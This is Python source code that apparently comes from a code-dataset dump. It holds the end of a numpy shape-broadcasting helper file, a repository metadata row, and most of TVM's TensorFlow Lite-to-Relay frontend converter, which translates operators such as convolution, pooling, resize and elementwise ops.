def broadcast_shape(shp1, shp2):
    """Compute the shape obtained by broadcasting two shapes together.

    Parameters
    ----------
    shp1 : tuple
        shape of array 1
    shp2 : tuple
        shape of array 2

    Returns
    -------
    tuple
        shape resulting from broadcasting two arrays using numpy rules

    Raises
    ------
    ValueError
        Arrays cannot be broadcasted
    """
    # Allocate uninitialized dummies: only the shapes matter for broadcasting.
    dummy1 = np.empty(shp1)
    dummy2 = np.empty(shp2)
    try:
        return np.broadcast(dummy1, dummy2).shape
    except ValueError:
        raise ValueError("Arrays cannot be broadcasted - %s and %s " % (str(shp1), str(shp2)))
def reduce_shape(inputArr, targetArr):
    """Reduce the dimensions by summing the input array over necessary axis
    to obtain the targetArray shape.

    Parameters
    ----------
    inputArr : np.array
        array to be reduced
    targetArr : np.array
        array whose shape the result must match

    Returns
    -------
    np.array
        Resulting array (sum over the necessary axis)

    Raises
    ------
    ValueError
        The two arrays cannot be reduced properly
    """
    if (inputArr.shape == targetArr.shape):
        return inputArr

    if (inputArr.ndim == targetArr.ndim):
        # Same rank: sum over every axis where the target was broadcast
        # (size 1), keeping dims so the result shape matches the target.
        axReduce = tuple(dimIndex for dimIndex in range(inputArr.ndim)
                         if targetArr.shape[dimIndex] == 1)
        return np.sum(inputArr, axis=axReduce, keepdims=True)

    # Different rank: try collapsing one axis in either orientation.
    # IndexError covers missing dimensions; TypeError covers scalar shapes.
    try:
        if (inputArr.shape[1] == targetArr.shape[0]):
            return np.sum(inputArr, axis=0)
    except (IndexError, TypeError):
        pass
    try:
        if (inputArr.shape[0] == targetArr.shape[1]):
            return np.sum(inputArr, axis=1)
    except (IndexError, TypeError):
        pass
    raise ValueError("The two arrays cannot be reduced properly")
from .operations.twoInputOperations import AddOperation, MatMatmulOperation, MultiplyOperation, DivideOperation
| 25.302682 | 111 | 0.570109 |
acfa9148a7566beb0359177374aa49fa202ec084 | 35,611 | py | Python | python/tvm/relay/frontend/tflite.py | ttyang1018/tvm | ade26cacd0767cf14dc053ac4d7778859f83a32c | [
"Apache-2.0"
] | 2 | 2019-12-27T04:50:01.000Z | 2021-02-04T09:54:21.000Z | python/tvm/relay/frontend/tflite.py | ttyang1018/tvm | ade26cacd0767cf14dc053ac4d7778859f83a32c | [
"Apache-2.0"
] | 1 | 2019-08-20T16:19:54.000Z | 2019-08-28T21:21:43.000Z | python/tvm/relay/frontend/tflite.py | ttyang1018/tvm | ade26cacd0767cf14dc053ac4d7778859f83a32c | [
"Apache-2.0"
] | 1 | 2019-07-17T08:10:49.000Z | 2019-07-17T08:10:49.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument
"""Tensorflow lite frontend."""
from __future__ import absolute_import as _abs
import math
import numpy as np
import tvm
from .. import ir_pass
from .. import expr as _expr
from .. import module as _module
from .. import op as _op
from ... import nd as _nd
from .common import ExprTable
__all__ = ['from_tflite']
class TensorWrapper(object):
    """Tensor wrapper for TFLite Tensor

    Bundles a tensor's index in the subgraph, the tflite Tensor object and
    its backing Buffer so converters can pass all three around together.
    """
    def __init__(self, tensor_idx, tensor, buffer):
        # tensor and buffer are 0 when this wrapper stands in for an absent
        # (negative-index) optional input -- see OperatorConverter.get_tensors.
        self.tensor_idx = tensor_idx
        self.tensor = tensor
        self.buffer = buffer
class OperatorConverter(object):
"""Operator Converted for converting TFLite ops to Relay ops"""
    def __init__(self, model, subgraph, exp_tab):
        """Set up enum-name lookup tables and the op-name -> converter map."""
        # Lazy import keeps the module importable without the tflite package.
        try:
            from tflite.BuiltinOperator import BuiltinOperator
            from tflite.BuiltinOptions import BuiltinOptions
            from tflite.ActivationFunctionType import ActivationFunctionType
        except ImportError:
            raise ImportError("The tflite package must be installed")
        self.model = model
        self.subgraph = subgraph
        self.exp_tab = exp_tab
        # Maps from TFLite enum integer values to their string field names.
        self.builtin_op_code = build_str_map(BuiltinOperator())
        self.activation_fn_type = build_str_map(ActivationFunctionType())
        self.builtin_options = build_str_map(BuiltinOptions())
        # Add more operators
        self.convert_map = {
            'CONV_2D': self.convert_conv2d,
            'DEPTHWISE_CONV_2D': self.convert_depthwise_conv2d,
            'AVERAGE_POOL_2D': self.convert_average_pool2d,
            'RESHAPE': self.convert_reshape,
            'RESIZE_BILINEAR': self.convert_resize_bilinear,
            'RESIZE_NEAREST_NEIGHBOR': self.convert_resize_nearest_neighbor,
            'SOFTMAX': self.convert_softmax,
            'SQUEEZE': self.convert_squeeze,
            'MAX_POOL_2D': self.convert_max_pool2d,
            'CONCATENATION': self.convert_concatenation,
            'ADD': self.convert_add,
            'SUB': self.convert_sub,
            'MUL': self.convert_mul,
            'DIV': self.convert_div,
            'POW': self.convert_pow,
            'MAXIMUM': self.convert_maximum,
            'MINIMUM': self.convert_minimum,
            'FULLY_CONNECTED': self.convert_fully_connected,
            'PAD': self.convert_pad,
            'LOGISTIC': self.convert_logistic,
        }
def check_unsupported_ops(self):
"""Check unsupported TFLite ops in our converter."""
unsupported_ops_set = set()
for op_idx in range(self.subgraph.OperatorsLength()):
op = self.subgraph.Operators(op_idx)
op_code_str = self.get_op_code_str(op)
if op_code_str not in self.convert_map:
unsupported_ops_set.add(op_code_str)
if unsupported_ops_set:
msg = 'The following operators are not supported in frontend ' \
'TFLite: {}'
ops = str(list(unsupported_ops_set)).strip('[,]')
raise tvm.error.OpNotImplemented(msg.format(ops))
    def convert_op_to_relay(self):
        """Convert TFLite ops to relay ops"""
        for op_idx in range(self.subgraph.OperatorsLength()):
            op = self.subgraph.Operators(op_idx)
            op_code_str = self.get_op_code_str(op)
            output_tensors = self.get_output_tensors(op)
            ret = self.convert_map[op_code_str](op)
            # Register the converted expression(s) under each output tensor's
            # name so later ops can look their inputs up in exp_tab.
            if len(output_tensors) == 1:
                tensor_idx = output_tensors[0].tensor_idx
                self.exp_tab.set_expr(get_tensor_name(self.subgraph, tensor_idx), ret)
            else:
                # Multiple outputs: the converter returned an indexable result.
                for idx, output_tensor in enumerate(output_tensors):
                    self.exp_tab.set_expr(get_tensor_name(self.subgraph, output_tensor.tensor_idx),
                                          ret[idx])
    def get_op_code_str(self, op):
        """Get TFLite ops string representation"""
        try:
            from tflite.BuiltinOperator import BuiltinOperator
        except ImportError:
            raise ImportError("The tflite package must be installed")
        # The operator stores an index into the model's opcode table; resolve
        # that to the builtin opcode id, then to its enum name.
        op_code_list_idx = op.OpcodeIndex()
        op_code_id = self.model.OperatorCodes(op_code_list_idx).BuiltinCode()
        op_code_str = self.builtin_op_code[op_code_id]
        if op_code_id == BuiltinOperator.CUSTOM:
            # Custom operator
            raise NotImplementedError("Custom operators are currently not supported")
        return op_code_str
def get_input_tensors(self, op):
operator_inputs = op.InputsAsNumpy()
return self.get_tensors(operator_inputs)
def get_output_tensors(self, op):
operator_outputs = op.OutputsAsNumpy()
return self.get_tensors(operator_outputs)
    def get_tensors(self, tensors_idx_list):
        """Get tensor wrapper list from given TFLite tensor index list"""
        return_list = list()
        for tensor_idx in tensors_idx_list:
            if tensor_idx < 0:
                # A negative index marks an absent optional tensor; use a
                # placeholder wrapper with dummy tensor/buffer values.
                return_list.append(TensorWrapper(tensor_idx, 0, 0))
                continue
            tensor = self.subgraph.Tensors(tensor_idx)
            buffer_idx = tensor.Buffer()
            buffer = self.model.Buffers(buffer_idx)
            return_list.append(TensorWrapper(tensor_idx, tensor, buffer))
        return return_list
def get_tensor_value(self, tensor_wrapper):
"""Get tensor buffer value from given tensor wrapper"""
assert isinstance(tensor_wrapper, TensorWrapper)
try:
from tflite.TensorType import TensorType
except ImportError:
raise ImportError("The tflite package must be installed")
if tensor_wrapper.tensor.Type() == TensorType.UINT8:
return np.frombuffer(tensor_wrapper.buffer.DataAsNumpy(), dtype=np.uint8).reshape(
tensor_wrapper.tensor.ShapeAsNumpy())
if tensor_wrapper.tensor.Type() == TensorType.FLOAT32:
return np.frombuffer(tensor_wrapper.buffer.DataAsNumpy(), dtype=np.float32).reshape(
tensor_wrapper.tensor.ShapeAsNumpy())
if tensor_wrapper.tensor.Type() == TensorType.INT32:
return np.frombuffer(tensor_wrapper.buffer.DataAsNumpy(), dtype=np.int32).reshape(
tensor_wrapper.tensor.ShapeAsNumpy())
raise NotImplementedError("Tensor type {} is currently not supported"
.format(str(tensor_wrapper.tensor.Type())))
def get_tensor_type_str(self, tensor_type):
"""Get tensor type string representation when given TFLite tensor type"""
try:
from tflite.TensorType import TensorType
except ImportError:
raise ImportError("The tflite package must be installed")
if tensor_type == TensorType.UINT8:
return "uint8"
if tensor_type == TensorType.FLOAT32:
return "float32"
if tensor_type == TensorType.INT32:
return "int32"
raise NotImplementedError("Tensor type {} is currently not supported"
.format(str(tensor_type)))
    # Thin dispatchers: shared implementations live in convert_conv/convert_pool2d.
    def convert_conv2d(self, op):
        """Convert TFLite conv2d"""
        return self.convert_conv(op, "conv2d")

    def convert_depthwise_conv2d(self, op):
        """Convert TFLite depthwise conv2d"""
        return self.convert_conv(op, "depthwise")

    def convert_average_pool2d(self, op):
        """Convert TFLite average pool2d"""
        return self.convert_pool2d(op, "average")

    def convert_max_pool2d(self, op):
        """Convert TFLite max pool2d"""
        return self.convert_pool2d(op, "max")
    def convert_reshape(self, op):
        """Convert TFLite reshape"""
        try:
            from tflite.BuiltinOptions import BuiltinOptions
            from tflite.Operator import Operator
            from tflite.ReshapeOptions import ReshapeOptions
        except ImportError:
            raise ImportError("The tflite package must be installed")
        assert isinstance(op, Operator)
        input_tensors = self.get_input_tensors(op)
        assert len(input_tensors) == 2, "input tensors length should be 2"
        input_tensor = input_tensors[0]
        input_tensor_idx = input_tensor.tensor_idx
        assert op.BuiltinOptionsType() == BuiltinOptions.ReshapeOptions
        op_options = op.BuiltinOptions()
        reshape_options = ReshapeOptions()
        reshape_options.Init(op_options.Bytes, op_options.Pos)
        # The target shape is read from the op's options; the second input
        # tensor (which also carries the shape) is ignored here.
        target_shape = reshape_options.NewShapeAsNumpy()
        in_expr = self.get_expr(input_tensor_idx)
        out = _op.reshape(in_expr, newshape=tuple(target_shape))
        return out
    def _convert_resize(self, method, op):
        """Generic method to Convert TFLite RESIZE operators"""
        try:
            from tflite.BuiltinOptions import BuiltinOptions
            from tflite.Operator import Operator
            from tflite.ResizeBilinearOptions import ResizeBilinearOptions
            # ResizeNearestNeighborOptions was added in tflite v1.13
            tflite_ver = 1120
            if 'ResizeNearestNeighborOptions' in dir(BuiltinOptions):
                from tflite.ResizeNearestNeighborOptions import ResizeNearestNeighborOptions
                tflite_ver = 1130
        except ImportError:
            raise ImportError("The tflite package must be installed")
        assert isinstance(op, Operator)
        input_tensors = self.get_input_tensors(op)
        assert len(input_tensors) == 2, "input tensors length should be 2"
        # images, 4-D Tensor with shape NHWC.
        input_tensor = input_tensors[0]
        in_expr = self.get_expr(input_tensor.tensor_idx)
        # size - 1-D int32 Tensor of 2 elements: new_height, new_width
        target_size = tuple(self.get_tensor_value(input_tensors[1]))
        # Options - align_corners (bool)
        resize_options = None
        align_corners = False
        if method == "BILINEAR":
            assert op.BuiltinOptionsType() == BuiltinOptions.ResizeBilinearOptions
            resize_options = ResizeBilinearOptions()
        elif tflite_ver >= 1130:
            # NEAREST_NEIGHBOR options only exist in tflite >= 1.13; on older
            # versions align_corners stays at its default of False.
            assert op.BuiltinOptionsType() == BuiltinOptions.ResizeNearestNeighborOptions
            resize_options = ResizeNearestNeighborOptions()
        if resize_options is not None:
            op_options = op.BuiltinOptions()
            resize_options.Init(op_options.Bytes, op_options.Pos)
            align_corners = resize_options.AlignCorners()
        # Use layout NHWC
        out = _op.image.resize(in_expr, target_size, "NHWC", method, align_corners)
        return out
    # Thin dispatchers over _convert_resize.
    def convert_resize_bilinear(self, op):
        """Convert TFLite RESIZE_BILINEAR"""
        return self._convert_resize("BILINEAR", op)

    def convert_resize_nearest_neighbor(self, op):
        """Convert TFLite RESIZE_NEAREST_NEIGHBOR"""
        return self._convert_resize("NEAREST_NEIGHBOR", op)
    def convert_logistic(self, op):
        """Convert TFLite LOGISTIC (sigmoid activation)"""
        try:
            from tflite.Operator import Operator
        except ImportError:
            raise ImportError("The tflite package must be installed")
        assert isinstance(op, Operator)
        input_tensors = self.get_input_tensors(op)
        assert len(input_tensors) == 1, "input tensors length should be 1"
        input_tensor = input_tensors[0]
        in_expr = self.get_expr(input_tensor.tensor_idx)
        out = _op.sigmoid(in_expr)
        return out
    def convert_softmax(self, op):
        """Convert TFLite softmax"""
        try:
            from tflite.Operator import Operator
        except ImportError:
            raise ImportError("The tflite package must be installed")
        assert isinstance(op, Operator)
        input_tensors = self.get_input_tensors(op)
        assert len(input_tensors) == 1, "input tensors length should be 1"
        input_tensor = input_tensors[0]
        input_tensor_idx = input_tensor.tensor_idx
        # NOTE(review): axis=1 treats dim 1 as channel; other converters here
        # assume NHWC layout where channel is the last axis -- confirm this is
        # only reached on 2-D (N, C) inputs.
        params = {'axis': 1}  # 1 is channel
        in_expr = self.get_expr(input_tensor_idx)
        out = _op.nn.softmax(in_expr, **params)
        return out
    def convert_concatenation(self, op):
        """Convert TFLite concatenation"""
        try:
            from tflite.Operator import Operator
            from tflite.ConcatenationOptions import ConcatenationOptions
            from tflite.BuiltinOptions import BuiltinOptions
            from tflite.ActivationFunctionType import ActivationFunctionType
        except ImportError:
            raise ImportError("The tflite package must be installed")
        assert isinstance(op, Operator)
        input_tensors = self.get_input_tensors(op)
        assert len(input_tensors) >= 1, "input tensors should greater than 1"
        in_exprs = [self.get_expr(input_tensor.tensor_idx) for input_tensor in input_tensors]
        output_tensors = self.get_output_tensors(op)
        assert len(output_tensors) == 1, "output tensors should be 1"
        assert op.BuiltinOptionsType() == BuiltinOptions.ConcatenationOptions
        op_options = op.BuiltinOptions()
        concatenation_options = ConcatenationOptions()
        concatenation_options.Init(op_options.Bytes, op_options.Pos)
        concatenation_axis = concatenation_options.Axis()
        fused_activation_fn = concatenation_options.FusedActivationFunction()
        # with axis in N H W C
        out = _op.concatenate(in_exprs, axis=concatenation_axis)
        # if we have activation fn
        if fused_activation_fn != ActivationFunctionType.NONE:
            out = self.convert_fused_activation_function(out, fused_activation_fn)
        return out
    def _convert_elemwise(self, relay_op, op):
        """Generic method to Convert TFLite elemwise

        Parameters
        ----------
        relay_op : callable
            binary relay operator to apply (e.g. _op.add)
        op : tflite.Operator.Operator
            the TFLite operator being converted
        """
        try:
            from tflite.Operator import Operator
            from tflite.AddOptions import AddOptions
            from tflite.SubOptions import SubOptions
            from tflite.MulOptions import MulOptions
            from tflite.DivOptions import DivOptions
            from tflite.BuiltinOptions import BuiltinOptions
            from tflite.ActivationFunctionType import ActivationFunctionType
        except ImportError:
            raise ImportError("The tflite package must be installed")
        assert isinstance(op, Operator)
        input_tensors = self.get_input_tensors(op)
        assert len(input_tensors) == 2, "input tensors length should be 2"
        lhs_tensor = input_tensors[0]
        lhs_expr = self.get_expr(lhs_tensor.tensor_idx)
        rhs_tensor = input_tensors[1]
        if self.has_expr(rhs_tensor.tensor_idx):
            # In most cases, we can assume that TOCO fuses elemwise operators
            # with constants - it means both will be tensors.
            rhs_expr = self.get_expr(rhs_tensor.tensor_idx)
        else:
            # However, in some corner cases, the elemwise operator is not fused,
            # we can receive as constant.
            rhs_type_str = self.get_tensor_type_str(rhs_tensor.tensor.Type())
            rhs_expr = self.exp_tab.new_const(self.get_tensor_value(rhs_tensor),
                                              dtype=rhs_type_str)
        out = relay_op(lhs_expr, rhs_expr)
        # Options (fused_activation_function)
        options = None
        if op.BuiltinOptionsType() == BuiltinOptions.AddOptions:
            options = AddOptions()
        elif op.BuiltinOptionsType() == BuiltinOptions.SubOptions:
            options = SubOptions()
        elif op.BuiltinOptionsType() == BuiltinOptions.MulOptions:
            options = MulOptions()
        elif op.BuiltinOptionsType() == BuiltinOptions.DivOptions:
            options = DivOptions()
        # POW/MAXIMUM/MINIMUM carry no options block; options stays None there
        # and no fused activation is applied.
        if options is not None:
            op_options = op.BuiltinOptions()
            options.Init(op_options.Bytes, op_options.Pos)
            fused_activation_fn = options.FusedActivationFunction()
            # if we have activation fn
            if fused_activation_fn != ActivationFunctionType.NONE:
                out = self.convert_fused_activation_function(out, fused_activation_fn)
        return out
    # Thin dispatchers over _convert_elemwise.
    def convert_add(self, op):
        """Convert TFLite ADD"""
        return self._convert_elemwise(_op.add, op)

    def convert_sub(self, op):
        """Convert TFLite SUB"""
        return self._convert_elemwise(_op.subtract, op)

    def convert_mul(self, op):
        """Convert TFLite MUL"""
        return self._convert_elemwise(_op.multiply, op)

    def convert_div(self, op):
        """Convert TFLite DIV"""
        return self._convert_elemwise(_op.divide, op)

    def convert_pow(self, op):
        """Convert TFLite POW"""
        return self._convert_elemwise(_op.power, op)

    def convert_maximum(self, op):
        """Convert TFLite MAXIMUM"""
        return self._convert_elemwise(_op.maximum, op)

    def convert_minimum(self, op):
        """Convert TFLite MINIMUM"""
        return self._convert_elemwise(_op.minimum, op)
    def convert_fully_connected(self, op):
        """Convert TFLite fully connected"""
        try:
            from tflite.Operator import Operator
            from tflite.FullyConnectedOptions import FullyConnectedOptions
            from tflite.BuiltinOptions import BuiltinOptions
            from tflite.TensorType import TensorType
            from tflite.ActivationFunctionType import ActivationFunctionType
        except ImportError:
            raise ImportError("The tflite package must be installed")
        assert isinstance(op, Operator)
        input_tensors = self.get_input_tensors(op)
        assert len(input_tensors) >= 2, "input tensors length should be >= 2"
        input_tensor = input_tensors[0]
        input_tensor_idx = input_tensor.tensor_idx
        weight_tensor = input_tensors[1]
        input_tensor_shape = input_tensor.tensor.ShapeAsNumpy()
        weight_tensor_shape = weight_tensor.tensor.ShapeAsNumpy()
        # reshape input tensor from N H W C to N H*W*C
        input_size_per_batch = 1
        for s in range(1, len(input_tensor_shape)):
            input_size_per_batch *= input_tensor_shape[s]
        assert input_size_per_batch == weight_tensor_shape[1], \
            "input size and weight size are mismatched"
        target_shape = tuple((input_tensor_shape[0], input_size_per_batch))
        in_expr = self.get_expr(input_tensor_idx)
        in_expr = _op.reshape(in_expr, target_shape)
        assert op.BuiltinOptionsType() == BuiltinOptions.FullyConnectedOptions
        op_options = op.BuiltinOptions()
        fully_connected_options = FullyConnectedOptions()
        fully_connected_options.Init(op_options.Bytes, op_options.Pos)
        fused_activation_fn = fully_connected_options.FusedActivationFunction()
        # weight tensor type should be UINT8 (quantization) or FLOAT32
        weight_tensor_type = weight_tensor.tensor.Type()
        assert weight_tensor_type in (TensorType.UINT8, TensorType.FLOAT32)
        weight_tensor_type_str = self.get_tensor_type_str(weight_tensor_type)
        weight_value = self.get_tensor_value(weight_tensor)
        weight_expr = self.exp_tab.new_const(weight_value, dtype=weight_tensor_type_str)
        out = _op.nn.dense(in_expr, weight_expr)
        # if we have bias
        if len(input_tensors) == 3:
            bias_tensor = input_tensors[2]
            bias_tensor_type = bias_tensor.tensor.Type()
            # bias tensor type should be INT32 (quantization) or FLOAT32
            assert bias_tensor_type in (TensorType.INT32, TensorType.FLOAT32)
            bias_tensor_type_str = self.get_tensor_type_str(bias_tensor_type)
            bias_expr = self.exp_tab.new_const(self.get_tensor_value(bias_tensor),
                                               dtype=bias_tensor_type_str)
            out = _op.nn.bias_add(out, bias_expr)
        # If we have fused activations
        if fused_activation_fn != ActivationFunctionType.NONE:
            out = self.convert_fused_activation_function(out, fused_activation_fn)
        return out
    def convert_squeeze(self, op):
        """Convert TFLite squeeze"""
        try:
            from tflite.BuiltinOptions import BuiltinOptions
            from tflite.Operator import Operator
            from tflite.SqueezeOptions import SqueezeOptions
        except ImportError:
            raise ImportError("The tflite package must be installed")
        assert isinstance(op, Operator)
        input_tensors = self.get_input_tensors(op)
        output_tensors = self.get_output_tensors(op)
        assert len(input_tensors) == 1, "input tensors length should be 1"
        assert len(output_tensors) == 1, "output tensors length should be 1"
        input_tensor = input_tensors[0]
        input_tensor_idx = input_tensor.tensor_idx
        assert op.BuiltinOptionsType() == BuiltinOptions.SqueezeOptions
        op_options = op.BuiltinOptions()
        squeeze_options = SqueezeOptions()
        squeeze_options.Init(op_options.Bytes, op_options.Pos)
        # Axes to drop come from the op's options, not an input tensor.
        squeeze_axis = squeeze_options.SqueezeDimsAsNumpy()
        in_expr = self.get_expr(input_tensor_idx)
        out = _op.squeeze(in_expr, axis=tuple(squeeze_axis))
        return out
    def convert_fused_activation_function(self, in_expr, fused_activation_fn):
        """Convert TFLite fused activation function

        Wraps in_expr in the relay expression for the given activation enum;
        raises OpNotImplemented for activations with no relay equivalent.
        """
        try:
            from tflite.ActivationFunctionType import ActivationFunctionType
        except ImportError:
            raise ImportError("The tflite package must be installed")
        assert fused_activation_fn != ActivationFunctionType.NONE
        if fused_activation_fn == ActivationFunctionType.RELU6:
            return _op.clip(in_expr, a_min=0, a_max=6)
        if fused_activation_fn == ActivationFunctionType.RELU:
            return _op.nn.relu(in_expr)
        if fused_activation_fn == ActivationFunctionType.RELU_N1_TO_1:
            return _op.clip(in_expr, a_min=-1, a_max=1)
        if fused_activation_fn == ActivationFunctionType.TANH:
            return _op.tanh(in_expr)
        fused_activation_fn_str = self.activation_fn_type[fused_activation_fn]
        raise tvm.error.OpNotImplemented(
            'Operator {} is not supported for frontend TFLite.'.format(fused_activation_fn_str))
    def convert_conv(self, op, conv_type):
        """convolution implementation.

        Parameters
        ----------
        op : tflite.Operator.Operator
            the TFLite operator being converted
        conv_type : str
            either 'conv2d' or 'depthwise'
        """
        try:
            from tflite.BuiltinOptions import BuiltinOptions
            from tflite.ActivationFunctionType import ActivationFunctionType
            from tflite.TensorType import TensorType
            from tflite.Operator import Operator
            from tflite.Conv2DOptions import Conv2DOptions
            from tflite.DepthwiseConv2DOptions import DepthwiseConv2DOptions
            from tflite.Padding import Padding
        except ImportError:
            raise ImportError("The tflite package must be installed")
        assert isinstance(op, Operator)
        input_tensors = self.get_input_tensors(op)
        assert len(input_tensors) >= 2, "input tensors length should be >= 2"
        input_tensor = input_tensors[0]
        input_tensor_idx = input_tensor.tensor_idx
        weight_tensor = input_tensors[1]
        is_depthwise_conv = False
        if conv_type == 'conv2d':
            assert op.BuiltinOptionsType() == BuiltinOptions.Conv2DOptions
            op_options = op.BuiltinOptions()
            conv_options = Conv2DOptions()
            conv_options.Init(op_options.Bytes, op_options.Pos)
        elif conv_type == 'depthwise':
            is_depthwise_conv = True
            assert op.BuiltinOptionsType() == BuiltinOptions.DepthwiseConv2DOptions
            op_options = op.BuiltinOptions()
            conv_options = DepthwiseConv2DOptions()
            conv_options.Init(op_options.Bytes, op_options.Pos)
            depth_multiplier = conv_options.DepthMultiplier()
            assert depth_multiplier == 1, "TF frontend transforms it to be 1 regardless of what " \
                                          "original value is set to 0.25, 0.5 or anything else"
        else:
            raise tvm.error.OpNotImplemented(
                'Operator {} is not supported for frontend TFLite.'.format(conv_type))
        stride_h = conv_options.StrideH()
        stride_w = conv_options.StrideW()
        dilation_h = conv_options.DilationHFactor()
        dilation_w = conv_options.DilationWFactor()
        padding = conv_options.Padding()
        fused_activation_fn = conv_options.FusedActivationFunction()
        _, input_h, input_w, _ = input_tensor.tensor.ShapeAsNumpy()
        if is_depthwise_conv:
            multiplier, kernel_h, kernel_w, in_channels = weight_tensor.tensor.ShapeAsNumpy()
            assert multiplier == depth_multiplier
        else:
            output_channels, kernel_h, kernel_w, _ = weight_tensor.tensor.ShapeAsNumpy()
        # Effective kernel extent once dilation is applied; used for SAME padding.
        dilated_kernel_h = dilation_h * (kernel_h - 1) + 1
        dilated_kernel_w = dilation_w * (kernel_w - 1) + 1
        params = {'kernel_size': [kernel_h, kernel_w],
                  'strides': [stride_h, stride_w],
                  'dilation': [dilation_h, dilation_w],
                  'padding': [0, 0],
                  'data_layout': 'NHWC'}
        if is_depthwise_conv:
            # Depthwise: grouped conv with one group per input channel.
            params['channels'] = int(in_channels * multiplier)
            params['groups'] = int(in_channels)
            params['kernel_layout'] = 'HWOI'
        else:
            params['channels'] = int(output_channels)
            params['kernel_layout'] = 'HWIO'
        # weight tensor type should be UINT8 (quantization) or FLOAT32
        weight_tensor_type = weight_tensor.tensor.Type()
        assert weight_tensor_type in (TensorType.UINT8, TensorType.FLOAT32)
        weight_tensor_type_str = self.get_tensor_type_str(weight_tensor_type)
        in_expr = self.get_expr(input_tensor_idx)
        weight_value = self.get_tensor_value(weight_tensor)
        # TFLite is OC/M KH KW IC, we require KH KW IC OC/M
        # M means multiplier in depthwise convolution
        weight_value = weight_value.transpose((1, 2, 3, 0))
        weight_expr = self.exp_tab.new_const(weight_value, dtype=weight_tensor_type_str)
        if padding == Padding.VALID:
            pass
        elif padding == Padding.SAME:
            # SAME padding is materialized as an explicit pad op before the conv.
            pad_top, pad_bottom = get_pad_value(input_h, dilated_kernel_h, stride_h)
            pad_left, pad_right = get_pad_value(input_w, dilated_kernel_w, stride_w)
            in_expr = _op.nn.pad(data=in_expr, pad_width=((0, 0),
                                                          (pad_top, pad_bottom),
                                                          (pad_left, pad_right),
                                                          (0, 0)))
        else:
            raise tvm.error.OpAttributeUnimplemented(
                'Padding format {} is not supported for operator Conv.'.format(padding))
        out = _op.nn.conv2d(data=in_expr, weight=weight_expr, **params)
        # if we have bias
        if len(input_tensors) == 3:
            bias_tensor = input_tensors[2]
            bias_tensor_type = bias_tensor.tensor.Type()
            # bias tensor type should be INT32 (quantization) or FLOAT32
            assert bias_tensor_type in (TensorType.INT32, TensorType.FLOAT32)
            bias_tensor_type_str = self.get_tensor_type_str(bias_tensor_type)
            bias_expr = self.exp_tab.new_const(self.get_tensor_value(bias_tensor),
                                               dtype=bias_tensor_type_str)
            channel_axis = 3
            out = _op.nn.bias_add(out, bias_expr, axis=channel_axis)
        # If we have fused activations
        if fused_activation_fn != ActivationFunctionType.NONE:
            out = self.convert_fused_activation_function(out, fused_activation_fn)
        return out
    def convert_pool2d(self, op, pool_type):
        """pool2d implementation.

        Parameters
        ----------
        op : tflite.Operator.Operator
            the TFLite operator being converted
        pool_type : str
            either 'average' or 'max'
        """
        try:
            from tflite.BuiltinOptions import BuiltinOptions
            from tflite.ActivationFunctionType import ActivationFunctionType
            from tflite.Operator import Operator
            from tflite.Pool2DOptions import Pool2DOptions
            from tflite.Padding import Padding
        except ImportError:
            raise ImportError("The tflite package must be installed")
        assert isinstance(op, Operator)
        input_tensors = self.get_input_tensors(op)
        assert len(input_tensors) == 1, "input tensors length should be 1"
        input_tensor = input_tensors[0]
        input_tensor_idx = input_tensor.tensor_idx
        assert op.BuiltinOptionsType() == BuiltinOptions.Pool2DOptions
        op_options = op.BuiltinOptions()
        pool2d_options = Pool2DOptions()
        pool2d_options.Init(op_options.Bytes, op_options.Pos)
        stride_h = pool2d_options.StrideH()
        stride_w = pool2d_options.StrideW()
        padding = pool2d_options.Padding()
        filter_h = pool2d_options.FilterHeight()
        filter_w = pool2d_options.FilterWidth()
        fused_activation_fn = pool2d_options.FusedActivationFunction()
        params = {'pool_size': (filter_h, filter_w),
                  'strides': (stride_h, stride_w),
                  'padding': [0, 0],
                  'layout': 'NHWC'}
        in_expr = self.get_expr(input_tensor_idx)
        _, input_h, input_w, _ = input_tensor.tensor.ShapeAsNumpy()
        if padding == Padding.VALID:
            pass
        elif padding == Padding.SAME:
            # Unlike convert_conv, SAME padding is passed to the pool op itself.
            pad_top, pad_bottom = get_pad_value(input_h, filter_h, stride_h)
            pad_left, pad_right = get_pad_value(input_w, filter_w, stride_w)
            params['padding'] = [pad_top, pad_left, pad_bottom, pad_right]
        else:
            raise tvm.error.OpAttributeUnimplemented(
                'Padding format {} for operator Pool2D is not supported.'.format(padding))
        if pool_type == "average":
            out = _op.nn.avg_pool2d(in_expr, **params)
        elif pool_type == "max":
            out = _op.nn.max_pool2d(in_expr, **params)
        else:
            raise tvm.error.OpNotImplemented(
                'Operator {} is not supported for frontend TFLite.'.format(pool_type + ' pool'))
        # If we have fused activations
        if fused_activation_fn != ActivationFunctionType.NONE:
            out = self.convert_fused_activation_function(out, fused_activation_fn)
        return out
    def convert_pad(self, op):
        """Convert TFLite PAD"""
        try:
            from tflite.Operator import Operator
        except ImportError:
            raise ImportError("The tflite package must be installed")
        assert isinstance(op, Operator)
        input_tensors = self.get_input_tensors(op)
        assert len(input_tensors) == 2, "input tensors length should be 2"
        # TFLite only support CONSTANT mode and does not support constant_values parameter.
        # tensor
        input_tensor = input_tensors[0]
        in_expr = self.get_expr(input_tensor.tensor_idx)
        # paddings
        pad_list = self.get_tensor_value(input_tensors[1])
        # convert list of lists to tuple of tuples
        paddings = tuple(tuple(l) for l in pad_list)
        # Use default pad_value 0 because TFLite does not support constant_values parameter
        out = _op.nn.pad(in_expr, paddings)
        return out
    def get_expr(self, input_tensor_idx):
        """Look up the relay expression registered for the given tensor index."""
        return self.exp_tab.get_expr(get_tensor_name(self.subgraph, input_tensor_idx))

    def has_expr(self, input_tensor_idx):
        """Return True if an expression is registered for the given tensor index."""
        return self.exp_tab.has_expr(get_tensor_name(self.subgraph, input_tensor_idx))
def build_str_map(obj):
    """Map each integer enum value of a TFLite enum class to its field name.

    Parameters
    ----------
    obj:
        TFLite class which contains enum int value, such as BuiltInOptions

    Returns
    -------
    dict
        mapping from enum int value to its string field name
    """
    return {
        getattr(obj, attr): attr
        for attr in dir(obj)
        if not attr.startswith('_') and isinstance(getattr(obj, attr), int)
    }
